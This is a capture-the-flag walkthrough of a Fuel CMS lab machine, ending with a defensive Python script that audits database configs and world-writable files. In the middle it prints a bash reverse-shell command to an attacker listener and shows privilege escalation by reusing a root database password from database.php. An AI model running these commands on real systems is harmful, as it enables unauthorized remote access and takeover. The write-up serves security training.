Nmap

First we scan for open ports:

# nmap -p- -T4 -sV -sC 10.10.11.178 -oA nmap 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 00:36 BST
Nmap scan report for 10.10.11.178
Host is up (0.021s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/fuel/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.39 seconds

Website

We go to the website, which shows what looks like the default page after a fresh installation of Fuel CMS.

Searching exploit-db turns up a relevant exploit. It needed slight modification: commenting out the proxy section and adding the specific target IP. Executing the exploit, we get a prompt for a command and can successfully query which user we are running as.

Now we can start a listener (nc -lvnp 6666) and get a shell back with the command bash -c "bash -i >& /dev/tcp/10.11.18.78/6666 0>&1". With this shell we have enough rights to get the user flag.

# rlwrap nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.145.47] 57256
bash: cannot set terminal process group (1036): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html$ ls -lah
ls -lah
total 52K
drwxrwxrwx 4 root root 4.0K Jul 26  2019 .
drwxr-xr-x 3 root root 4.0K Jul 26  2019 ..
-rw-r--r-- 1 root root  163 Jul 26  2019 .htaccess
-rwxrwxrwx 1 root root 1.4K Jul 26  2019 README.md
drwxrwxrwx 9 root root 4.0K Jul 26  2019 assets
-rwxrwxrwx 1 root root  193 Jul 26  2019 composer.json
-rwxrwxrwx 1 root root 6.4K Jul 26  2019 contributing.md
drwxrwxrwx 9 root root 4.0K Jul 26  2019 fuel
-rwxrwxrwx 1 root root  12K Jul 26  2019 index.php
-rwxrwxrwx 1 root root   30 Jul 26  2019 robots.txt
www-data@ubuntu:/var/www/html$ ls /home
ls /home
www-data
www-data@ubuntu:/var/www/html$ ls /home/www-data
ls /home/www-data
flag.txt
www-data@ubuntu:/var/www/html$ cat /home/www-data/flag.txt
cat /home/www-data/flag.txt
64****************************9b

Privilege Escalation

Looking around inside the host, we find a configuration file for the database that contains a password:

www-data@ubuntu:/var/www/html/fuel/application/config$ cat database.php
cat database.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');

...
...
...

$db['default'] = array(
        'dsn'   => '',
        'hostname' => 'localhost',
        'username' => 'root',
        'password' => '******',
        'database' => 'fuel_schema',
        'dbdriver' => 'mysqli',
        'dbprefix' => '',
        'pconnect' => FALSE,
        'db_debug' => (ENVIRONMENT !== 'production'),
        'cache_on' => FALSE,
        'cachedir' => '',
        'char_set' => 'utf8',
        'dbcollat' => 'utf8_general_ci',
        'swap_pre' => '',
        'encrypt' => FALSE,
        'compress' => FALSE,
        'stricton' => FALSE,
        'failover' => array(),
        'save_queries' => TRUE
);

It turns out this password is the same as the root user's, so we can simply log in as root and get the flag:

www-data@ubuntu:/var/www/html/fuel/application/config$ su root
su root
Password: ******

root@ubuntu:/var/www/html/fuel/application/config# cd
cd
root@ubuntu:~# ls
ls
root.txt
root@ubuntu:~# cat root.txt
cat root.txt
b9****************************2d
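
A defender-side check for the two weaknesses this walkthrough relies on (a world-writable web root and a root database credential stored in database.php), as an added example that is not part of the original write-up. The function names, the sample tree and the PLACEHOLDER password are constructed for illustration.

```python
import os, re, stat, tempfile

# Matches 'key' => 'value' string pairs inside a CodeIgniter $db[...] array.
PAIR = re.compile(r"""['"](\w+)['"]\s*=>\s*['"]([^'"]*)['"]""")

def audit_db_config(path):
    """Return a list of findings for a CodeIgniter-style database.php."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        settings = dict(PAIR.findall(fh.read()))
    if settings.get("username") == "root":
        findings.append("app connects to the database as root")
    if settings.get("password"):
        findings.append("password hardcoded in config file")
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        findings.append("config is world-readable (mode %o)" % mode)
    if mode & stat.S_IWOTH:
        findings.append("config is world-writable (mode %o)" % mode)
    return findings

def world_writable(root):
    """List paths under root that any local user can modify."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full) and os.lstat(full).st_mode & stat.S_IWOTH:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)

def build_sample(root):
    """Constructed sample tree modelled on the listing above (placeholder password)."""
    cfg_dir = os.path.join(root, "fuel", "application", "config")
    os.makedirs(cfg_dir)
    cfg = os.path.join(cfg_dir, "database.php")
    with open(cfg, "w") as fh:
        fh.write("<?php\n$db['default'] = array(\n  'hostname' => 'localhost',\n"
                 "  'username' => 'root',\n  'password' => 'PLACEHOLDER',\n"
                 "  'database' => 'fuel_schema',\n  'pconnect' => FALSE,\n);\n")
    os.chmod(cfg, 0o644)
    index = os.path.join(root, "index.php")
    open(index, "w").close()
    os.chmod(index, 0o777)  # same mode as index.php in the listing above
    return cfg

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        print(audit_db_config(build_sample(root)))
        print(world_writable(root))
```

The file checks cannot tell that the database password doubles as the root login password; that reuse has to be caught by giving the application its own low-privilege database account with a unique password.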